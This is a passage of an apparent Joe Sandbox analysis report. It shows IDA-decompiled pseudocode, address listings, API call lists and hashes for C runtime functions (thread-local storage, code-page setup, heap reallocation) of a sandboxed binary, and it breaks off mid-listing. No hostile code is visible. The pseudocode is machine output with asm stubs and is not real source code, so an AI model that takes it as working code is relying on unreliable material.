                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Char$ByteMultiUpperWide$ErrorLast
                                          • String ID:
                                          • API String ID: 3939315453-0
                                          • Opcode ID: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                                          • Instruction ID: 0842cb939f6927aecb542cd9758d214692c03acffe84293a02396fd76ee0080f
                                          • Opcode Fuzzy Hash: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                                          • Instruction Fuzzy Hash: B30144B65001197ADB20ABE49CC9DEBBA7CDB08259F414572F942A3281E3756E4487B8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00415523 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00415523() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x420740);
				if(_t16 == 0) {
					_t16 = E00416EFC(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x420740, _t16) == 0) {
						E00414C0C(0x10);
					} else {
						E00415510(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}






                                          0x00415531
                                          0x00415539
                                          0x0041553d
                                          0x00415548
                                          0x0041554e
                                          0x00415578
                                          0x00415561
                                          0x00415562
                                          0x00415568
                                          0x0041556e
                                          0x00415572
                                          0x00415572
                                          0x0041554e
                                          0x0041557f
                                          0x00415589

                                          APIs
                                          • GetLastError.KERNEL32(00000103,7FFFFFFF,00416EEF,00417BBE,00000000,?,?,00000000,00000001), ref: 00415525
                                          • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00415533
                                          • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041557F
                                            • Part of subcall function 00416EFC: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00416FF2
                                          • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00415557
                                          • GetCurrentThreadId.KERNEL32 ref: 00415568
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue$AllocCurrentHeapThread
                                          • String ID:
                                          • API String ID: 2020098873-0
                                          • Opcode ID: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                                          • Instruction ID: cede6b9146d9eee740ee2dfbc4b23865fcca372efd47330e9e203dd76af2c63a
                                          • Opcode Fuzzy Hash: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                                          • Instruction Fuzzy Hash: 09F09635A01611BBC7312B74AC096DB3E62EB857A1B51413AF551962A4DB28888196EC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00417E3A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 143COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E00417E3A(int _a4) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				void* __ebx;
				void* __edi;
				intOrPtr* _t36;
				signed int _t40;
				signed int _t41;
				int _t43;
				signed int _t47;
				signed int _t49;
				int _t50;
				signed char* _t51;
				signed int _t55;
				signed char* _t57;
				signed int _t60;
				intOrPtr* _t63;
				signed int _t65;
				signed char _t66;
				signed char _t68;
				signed char _t69;
				signed int _t70;
				void* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				void* _t85;

				E0041570A(0x19);
				_t50 = E00417FE7(_a4);
				_t85 = _t50 -  *0x4256c8; // 0x4e4
				_a4 = _t50;
				if(_t85 != 0) {
					__eflags = _t50;
					if(_t50 == 0) {
						L30:
						E00418064();
					} else {
						_t65 = 0;
						__eflags = 0;
						_t36 = 0x422af8;
						while(1) {
							__eflags =  *_t36 - _t50;
							if( *_t36 == _t50) {
								break;
							}
							_t36 = _t36 + 0x30;
							_t65 = _t65 + 1;
							__eflags = _t36 - 0x422be8;
							if(_t36 < 0x422be8) {
								continue;
							} else {
								_t43 = GetCPInfo(_t50,  &_v28);
								_t81 = 1;
								__eflags = _t43 - _t81;
								if(_t43 != _t81) {
									__eflags =  *0x423510;
									if( *0x423510 == 0) {
										_t77 = _t81 | 0xffffffff;
										__eflags = _t77;
									} else {
										goto L30;
									}
								} else {
									 *0x4258e4 =  *0x4258e4 & 0x00000000;
									_t60 = 0x40;
									__eflags = _v28 - _t81;
									memset(0x4257e0, 0, _t60 << 2);
									asm("stosb");
									 *0x4256c8 = _t50;
									if(__eflags <= 0) {
										 *0x4256dc =  *0x4256dc & 0x00000000;
										__eflags =  *0x4256dc;
									} else {
										__eflags = _v22;
										if(_v22 != 0) {
											_t63 =  &_v21;
											while(1) {
												_t69 =  *_t63;
												__eflags = _t69;
												if(_t69 == 0) {
													goto L24;
												}
												_t49 =  *(_t63 - 1) & 0x000000ff;
												_t70 = _t69 & 0x000000ff;
												while(1) {
													__eflags = _t49 - _t70;
													if(_t49 > _t70) {
														break;
													}
													 *(_t49 + 0x4257e1) =  *(_t49 + 0x4257e1) | 0x00000004;
													_t49 = _t49 + 1;
												}
												_t63 = _t63 + 2;
												__eflags =  *(_t63 - 1);
												if( *(_t63 - 1) != 0) {
													continue;
												}
												goto L24;
											}
										}
										L24:
										_t47 = _t81;
										do {
											 *(_t47 + 0x4257e1) =  *(_t47 + 0x4257e1) | 0x00000008;
											_t47 = _t47 + 1;
											__eflags = _t47 - 0xff;
										} while (_t47 < 0xff);
										 *0x4258e4 = E00418031(_t50);
										 *0x4256dc = _t81;
									}
									_t71 = 0x4256d0;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L31:
									E0041808D(_t50, _t71);
									goto L1;
								}
							}
							goto L33;
						}
						_v8 = _v8 & 0x00000000;
						_t55 = 0x40;
						memset(0x4257e0, 0, _t55 << 2);
						_t79 = _t65 + _t65 * 2 << 4;
						__eflags = _t79;
						asm("stosb");
						_t16 = _t79 + 0x422b08; // 0x422b08
						_t51 = _t16;
						do {
							__eflags =  *_t51;
							_t57 = _t51;
							if( *_t51 != 0) {
								while(1) {
									_t17 =  &(_t57[1]); // 0xdf
									_t66 =  *_t17;
									__eflags = _t66;
									if(_t66 == 0) {
										goto L21;
									}
									_t41 =  *_t57 & 0x000000ff;
									_t74 = _t66 & 0x000000ff;
									__eflags = _t41 - _t74;
									if(_t41 <= _t74) {
										_t19 = _v8 + 0x422af0; // 0x8040201
										_t68 =  *_t19;
										do {
											 *(_t41 + 0x4257e1) =  *(_t41 + 0x4257e1) | _t68;
											_t41 = _t41 + 1;
											__eflags = _t41 - _t74;
										} while (_t41 <= _t74);
									}
									_t57 =  &(_t57[2]);
									__eflags =  *_t57;
									if( *_t57 != 0) {
										continue;
									}
									goto L21;
								}
							}
							L21:
							_v8 = _v8 + 1;
							_t51 =  &(_t51[8]);
							__eflags = _v8 - 4;
						} while (_v8 < 4);
						 *0x4256dc = 1;
						 *0x4256c8 = _a4;
						_t40 = E00418031(_a4);
						_t71 = 0x4256d0;
						asm("movsd");
						asm("movsd");
						 *0x4258e4 = _t40;
						asm("movsd");
					}
					goto L31;
				} else {
					L1:
					_t77 = 0;
				}
				L33:
				E0041576B(0x19);
				return _t77;
			}
































                                          0x00417e45
                                          0x00417e52
                                          0x00417e55
                                          0x00417e5c
                                          0x00417e5f
                                          0x00417e68
                                          0x00417e6a
                                          0x00417fc6
                                          0x00417fc6
                                          0x00417e70
                                          0x00417e70
                                          0x00417e70
                                          0x00417e72
                                          0x00417e77
                                          0x00417e77
                                          0x00417e79
                                          0x00000000
                                          0x00000000
                                          0x00417e7b
                                          0x00417e7e
                                          0x00417e7f
                                          0x00417e84
                                          0x00000000
                                          0x00417e86
                                          0x00417e8b
                                          0x00417e93
                                          0x00417e94
                                          0x00417e96
                                          0x00417fbd
                                          0x00417fc4
                                          0x00417fd5
                                          0x00417fd5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00417e9c
                                          0x00417e9e
                                          0x00417ea5
                                          0x00417ead
                                          0x00417eb0
                                          0x00417eb2
                                          0x00417eb3
                                          0x00417eb9
                                          0x00417faa
                                          0x00417faa
                                          0x00417ebf
                                          0x00417ebf
                                          0x00417ec3
                                          0x00417ec9
                                          0x00417ecc
                                          0x00417ecc
                                          0x00417ece
                                          0x00417ed0
                                          0x00000000
                                          0x00000000
                                          0x00417ed6
                                          0x00417eda
                                          0x00417edd
                                          0x00417edd
                                          0x00417edf
                                          0x00000000
                                          0x00000000
                                          0x00417ee5
                                          0x00417eec
                                          0x00417eec
                                          0x00417f7a
                                          0x00417f7b
                                          0x00417f7f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00417f7f
                                          0x00417ecc
                                          0x00417f85
                                          0x00417f85
                                          0x00417f87
                                          0x00417f87
                                          0x00417f8e
                                          0x00417f8f
                                          0x00417f8f
                                          0x00417f9d
                                          0x00417fa2
                                          0x00417fa2
                                          0x00417fb3
                                          0x00417fb8
                                          0x00417fb9
                                          0x00417fba
                                          0x00417fcb
                                          0x00417fcb
                                          0x00000000
                                          0x00417fcb
                                          0x00417e96
                                          0x00000000
                                          0x00417e84
                                          0x00417eef
                                          0x00417ef5
                                          0x00417f00
                                          0x00417f02
                                          0x00417f02
                                          0x00417f05
                                          0x00417f06
                                          0x00417f06
                                          0x00417f0c
                                          0x00417f0c
                                          0x00417f0f
                                          0x00417f11
                                          0x00417f13
                                          0x00417f13
                                          0x00417f13
                                          0x00417f16
                                          0x00417f18
                                          0x00000000
                                          0x00000000
                                          0x00417f1a
                                          0x00417f1d
                                          0x00417f20
                                          0x00417f22
                                          0x00417f27
                                          0x00417f27
                                          0x00417f2d
                                          0x00417f2d
                                          0x00417f33
                                          0x00417f34
                                          0x00417f34
                                          0x00417f2d
                                          0x00417f39
                                          0x00417f3a
                                          0x00417f3d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00417f3d
                                          0x00417f13
                                          0x00417f3f
                                          0x00417f3f
                                          0x00417f42
                                          0x00417f45
                                          0x00417f45
                                          0x00417f4e
                                          0x00417f59
                                          0x00417f5e
                                          0x00417f69
                                          0x00417f6e
                                          0x00417f6f
                                          0x00417f71
                                          0x00417f76
                                          0x00417f76
                                          0x00000000
                                          0x00417e61
                                          0x00417e61
                                          0x00417e61
                                          0x00417e61
                                          0x00417fd8
                                          0x00417fda
                                          0x00417fe6

                                          APIs
                                            • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                            • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                                          • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00414BA4), ref: 00417E8B
                                            • Part of subcall function 0041576B: LeaveCriticalSection.KERNEL32(?,00413F70,00000009,00413F5C,00000000,?,00000000,00000000,00000000), ref: 00415778
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterInfoInitializeLeave
                                          • String ID: +B$WB$WB
                                          • API String ID: 1866836854-4076192905
                                          • Opcode ID: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                                          • Instruction ID: 91cfe2518806d3d9ee68befd2fe7c4d9c34af4d87c59522c175cbc6726151178
                                          • Opcode Fuzzy Hash: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                                          • Instruction Fuzzy Hash: FC41243164C654AEE720DB24D8853EB7BF1AB05314FB4406BE5488B291CABD49C7C74C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041458F Relevance: 6.5, APIs: 5, Instructions: 278COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E0041458F(void* _a4, long _a8) {
				signed int _v8;
				intOrPtr _v20;
				long _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				long _v56;
				char _v60;
				intOrPtr _t56;
				void* _t57;
				long _t58;
				long _t59;
				long _t63;
				long _t66;
				long _t68;
				long _t71;
				long _t72;
				long _t74;
				long _t78;
				intOrPtr _t80;
				void* _t83;
				long _t85;
				long _t88;
				void* _t89;
				long _t91;
				intOrPtr _t93;
				void* _t97;
				void* _t104;
				long _t113;
				long _t116;
				intOrPtr _t122;
				void* _t123;

				_push(0xffffffff);
				_push(0x41b9b8);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t122;
				_t123 = _t122 - 0x28;
				_t97 = _a4;
				_t113 = 0;
				if(_t97 != 0) {
					_t116 = _a8;
					__eflags = _t116;
					if(_t116 != 0) {
						_t56 =  *0x425a38; // 0x1
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							__eflags = _t56 - 2;
							if(_t56 != 2) {
								while(1) {
									_t57 = 0;
									__eflags = _t116 - 0xffffffe0;
									if(_t116 <= 0xffffffe0) {
										__eflags = _t116 - _t113;
										if(_t116 == _t113) {
											_t116 = 1;
										}
										_t116 = _t116 + 0x0000000f & 0xfffffff0;
										__eflags = _t116;
										_t57 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
									}
									__eflags = _t57 - _t113;
									if(_t57 != _t113) {
										goto L64;
									}
									__eflags =  *0x4233b4 - _t113; // 0x0
									if(__eflags == 0) {
										goto L64;
									}
									_t58 = E00415868(_t116);
									__eflags = _t58;
									if(_t58 != 0) {
										continue;
									}
									goto L63;
								}
								goto L64;
							}
							__eflags = _t116 - 0xffffffe0;
							if(_t116 <= 0xffffffe0) {
								__eflags = _t116;
								if(_t116 <= 0) {
									_t116 = 0x10;
								} else {
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
								}
								_a8 = _t116;
							}
							while(1) {
								_v40 = _t113;
								__eflags = _t116 - 0xffffffe0;
								if(_t116 <= 0xffffffe0) {
									E0041570A(9);
									_pop(_t104);
									_v8 = 1;
									_t63 = E004167F8(_t97,  &_v60,  &_v48);
									_t123 = _t123 + 0xc;
									_t113 = _t63;
									_v52 = _t113;
									__eflags = _t113;
									if(_t113 == 0) {
										_v40 = HeapReAlloc( *0x425a34, 0, _t97, _t116);
									} else {
										__eflags = _t116 -  *0x42283c; // 0x1e0
										if(__eflags < 0) {
											_t100 = _t116 >> 4;
											_t71 = E00416BC0(_t104, _v60, _v48, _t113, _t116 >> 4);
											_t123 = _t123 + 0x10;
											__eflags = _t71;
											if(_t71 == 0) {
												_t72 = E00416894(_t104, _t100);
												_v40 = _t72;
												__eflags = _t72;
												if(_t72 != 0) {
													_t74 = ( *_t113 & 0x000000ff) << 4;
													_v56 = _t74;
													__eflags = _t74 - _t116;
													if(_t74 >= _t116) {
														_t74 = _t116;
													}
													E00414090(_v40, _a4, _t74);
													E0041684F(_v60, _v48, _t113);
													_t123 = _t123 + 0x18;
												}
											} else {
												_v40 = _a4;
											}
											_t97 = _a4;
										}
										__eflags = _v40;
										if(_v40 == 0) {
											_t66 = HeapAlloc( *0x425a34, 0, _t116);
											_v40 = _t66;
											__eflags = _t66;
											if(_t66 != 0) {
												_t68 = ( *_t113 & 0x000000ff) << 4;
												_v56 = _t68;
												__eflags = _t68 - _t116;
												if(_t68 >= _t116) {
													_t68 = _t116;
												}
												E00414090(_v40, _t97, _t68);
												E0041684F(_v60, _v48, _t113);
												_t123 = _t123 + 0x18;
											}
										}
									}
									_t51 =  &_v8;
									 *_t51 = _v8 | 0xffffffff;
									__eflags =  *_t51;
									E00414868();
								}
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x4233b4 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								_t59 = E00415868(_t116);
								__eflags = _t59;
								if(_t59 != 0) {
									continue;
								}
								goto L63;
							}
							goto L64;
						} else {
							goto L5;
						}
						do {
							L5:
							_v40 = _t113;
							__eflags = _t116 - 0xffffffe0;
							if(_t116 > 0xffffffe0) {
								L25:
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x4233b4 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								goto L27;
							}
							E0041570A(9);
							_v8 = _t113;
							_t80 = E00415A9D(_t97);
							_v44 = _t80;
							__eflags = _t80 - _t113;
							if(_t80 == _t113) {
								L21:
								_v8 = _v8 | 0xffffffff;
								E0041471A();
								__eflags = _v44 - _t113;
								if(_v44 == _t113) {
									__eflags = _t116 - _t113;
									if(_t116 == _t113) {
										_t116 = 1;
									}
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
									__eflags = _t116;
									_a8 = _t116;
									_v40 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
								}
								goto L25;
							}
							__eflags = _t116 -  *0x425a30; // 0x0
							if(__eflags <= 0) {
								_push(_t116);
								_push(_t97);
								_push(_t80);
								_t88 = E004162A6();
								_t123 = _t123 + 0xc;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t116);
									_t89 = E00415DF1();
									_v40 = _t89;
									__eflags = _t89 - _t113;
									if(_t89 != _t113) {
										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
										_v36 = _t91;
										__eflags = _t91 - _t116;
										if(_t91 >= _t116) {
											_t91 = _t116;
										}
										E00414090(_v40, _t97, _t91);
										_t93 = E00415A9D(_t97);
										_v44 = _t93;
										_push(_t97);
										_push(_t93);
										E00415AC8();
										_t123 = _t123 + 0x18;
									}
								} else {
									_v40 = _t97;
								}
							}
							__eflags = _v40 - _t113;
							if(_v40 == _t113) {
								__eflags = _t116 - _t113;
								if(_t116 == _t113) {
									_t116 = 1;
									_a8 = _t116;
								}
								_t116 = _t116 + 0x0000000f & 0xfffffff0;
								_a8 = _t116;
								_t83 = HeapAlloc( *0x425a34, _t113, _t116);
								_v40 = _t83;
								__eflags = _t83 - _t113;
								if(_t83 != _t113) {
									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
									_v36 = _t85;
									__eflags = _t85 - _t116;
									if(_t85 >= _t116) {
										_t85 = _t116;
									}
									E00414090(_v40, _t97, _t85);
									_push(_t97);
									_push(_v44);
									E00415AC8();
									_t123 = _t123 + 0x14;
								}
							}
							goto L21;
							L27:
							_t78 = E00415868(_t116);
							__eflags = _t78;
						} while (_t78 != 0);
						goto L63;
					} else {
						E00413F9F(_t97);
						L63:
						_t57 = 0;
						__eflags = 0;
						goto L64;
					}
				} else {
					_t57 = E00413E65(_a8);
					L64:
					 *[fs:0x0] = _v20;
					return _t57;
				}
			}




































                                          0x00414592
                                          0x00414594
                                          0x00414599
                                          0x004145a4
                                          0x004145a5
                                          0x004145ac
                                          0x004145b2
                                          0x004145b5
                                          0x004145b9
                                          0x004145c9
                                          0x004145cc
                                          0x004145ce
                                          0x004145dc
                                          0x004145e1
                                          0x004145e4
                                          0x00414723
                                          0x00414726
                                          0x00414873
                                          0x00414873
                                          0x00414875
                                          0x00414878
                                          0x0041487a
                                          0x0041487c
                                          0x00414880
                                          0x00414880
                                          0x00414884
                                          0x00414884
                                          0x00414890
                                          0x00414890
                                          0x00414896
                                          0x00414898
                                          0x00000000
                                          0x00000000
                                          0x0041489a
                                          0x004148a0
                                          0x00000000
                                          0x00000000
                                          0x004148a3
                                          0x004148a9
                                          0x004148ab
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004148ab
                                          0x00000000
                                          0x00414873
                                          0x0041472c
                                          0x0041472f
                                          0x00414731
                                          0x00414733
                                          0x0041473f
                                          0x00414735
                                          0x00414738
                                          0x00414738
                                          0x00414740
                                          0x00414740
                                          0x00414743
                                          0x00414743
                                          0x00414746
                                          0x00414749
                                          0x00414751
                                          0x00414756
                                          0x00414757
                                          0x00414767
                                          0x0041476c
                                          0x0041476f
                                          0x00414771
                                          0x00414774
                                          0x00414776
                                          0x00414836
                                          0x0041477c
                                          0x0041477c
                                          0x00414782
                                          0x00414786
                                          0x00414791
                                          0x00414796
                                          0x00414799
                                          0x0041479b
                                          0x004147a6
                                          0x004147ac
                                          0x004147af
                                          0x004147b1
                                          0x004147b6
                                          0x004147b9
                                          0x004147bc
                                          0x004147be
                                          0x004147c0
                                          0x004147c0
                                          0x004147c9
                                          0x004147d5
                                          0x004147da
                                          0x004147da
                                          0x0041479d
                                          0x004147a0
                                          0x004147a0
                                          0x004147dd
                                          0x004147dd
                                          0x004147e0
                                          0x004147e4
                                          0x004147ef
                                          0x004147f5
                                          0x004147f8
                                          0x004147fa
                                          0x004147ff
                                          0x00414802
                                          0x00414805
                                          0x00414807
                                          0x00414809
                                          0x00414809
                                          0x00414810
                                          0x0041481c
                                          0x00414821
                                          0x00414821
                                          0x004147fa
                                          0x004147e4
                                          0x00414839
                                          0x00414839
                                          0x00414839
                                          0x0041483d
                                          0x0041483d
                                          0x00414842
                                          0x00414845
                                          0x00414847
                                          0x00000000
                                          0x00000000
                                          0x00414849
                                          0x0041484f
                                          0x00000000
                                          0x00000000
                                          0x00414852
                                          0x00414858
                                          0x0041485a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00414860
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004145ea
                                          0x004145ea
                                          0x004145ea
                                          0x004145ed
                                          0x004145f0
                                          0x004146e7
                                          0x004146e7
                                          0x004146ea
                                          0x004146ec
                                          0x00000000
                                          0x00000000
                                          0x004146f2
                                          0x004146f8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004146f8
                                          0x004145f8
                                          0x004145fe
                                          0x00414602
                                          0x00414608
                                          0x0041460b
                                          0x0041460d
                                          0x004146b7
                                          0x004146b7
                                          0x004146bb
                                          0x004146c0
                                          0x004146c3
                                          0x004146c5
                                          0x004146c7
                                          0x004146cb
                                          0x004146cb
                                          0x004146cf
                                          0x004146cf
                                          0x004146d2
                                          0x004146e4
                                          0x004146e4
                                          0x00000000
                                          0x004146c3
                                          0x00414613
                                          0x00414619
                                          0x0041461b
                                          0x0041461c
                                          0x0041461d
                                          0x0041461e
                                          0x00414623
                                          0x00414626
                                          0x00414628
                                          0x0041462f
                                          0x00414630
                                          0x00414636
                                          0x00414639
                                          0x0041463b
                                          0x00414640
                                          0x00414641
                                          0x00414644
                                          0x00414646
                                          0x00414648
                                          0x00414648
                                          0x0041464f
                                          0x00414655
                                          0x0041465a
                                          0x0041465d
                                          0x0041465e
                                          0x0041465f
                                          0x00414664
                                          0x00414664
                                          0x0041462a
                                          0x0041462a
                                          0x0041462a
                                          0x00414628
                                          0x00414667
                                          0x0041466a
                                          0x0041466c
                                          0x0041466e
                                          0x00414672
                                          0x00414673
                                          0x00414673
                                          0x00414679
                                          0x0041467c
                                          0x00414687
                                          0x0041468d
                                          0x00414690
                                          0x00414692
                                          0x00414697
                                          0x00414698
                                          0x0041469b
                                          0x0041469d
                                          0x0041469f
                                          0x0041469f
                                          0x004146a6
                                          0x004146ab
                                          0x004146ac
                                          0x004146af
                                          0x004146b4
                                          0x004146b4
                                          0x00414692
                                          0x00000000
                                          0x004146fe
                                          0x004146ff
                                          0x00414705
                                          0x00414705
                                          0x00000000
                                          0x004145d0
                                          0x004145d1
                                          0x004148ad
                                          0x004148ad
                                          0x004148ad
                                          0x00000000
                                          0x004148ad
                                          0x004145bb
                                          0x004145be
                                          0x004148af
                                          0x004148b2
                                          0x004148bd
                                          0x004148bd

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                                          • Instruction ID: b0a20c71c01645f6642c62949d543ab21d76ee58160ce25a59b39075e73dd19d
                                          • Opcode Fuzzy Hash: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                                          • Instruction Fuzzy Hash: 4691E671D01514ABCB21AB69DC85ADEBBB4EFC5764F240227F818B62D0D7398DC1CA6C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041659C Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041659C() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x420828 != 0xffffffff) {
					_t43 = HeapAlloc( *0x425a34, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x420818;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x420818) {
							HeapFree( *0x425a34, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x420818) {
						 *_t43 = 0x420818;
						_t25 =  *0x42081c; // 0x420818
						 *(_t43 + 4) = _t25;
						 *0x42081c = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x420818 == 0) {
							 *0x420818 = 0x420818;
						}
						if( *0x42081c == 0) {
							 *0x42081c = 0x420818;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E00417DA0(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}









                                          0x004165a7
                                          0x004165c3
                                          0x004165c7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004165a9
                                          0x004165a9
                                          0x004165cd
                                          0x004165e3
                                          0x004165e7
                                          0x004166c2
                                          0x004166c8
                                          0x004166d3
                                          0x004166d3
                                          0x004166d9
                                          0x00000000
                                          0x004166d9
                                          0x004165ff
                                          0x004166bc
                                          0x00000000
                                          0x004166bc
                                          0x0041660c
                                          0x0041662c
                                          0x0041662e
                                          0x00416633
                                          0x00416636
                                          0x0041663f
                                          0x0041660e
                                          0x00416615
                                          0x00416617
                                          0x00416617
                                          0x00416623
                                          0x00416625
                                          0x00416625
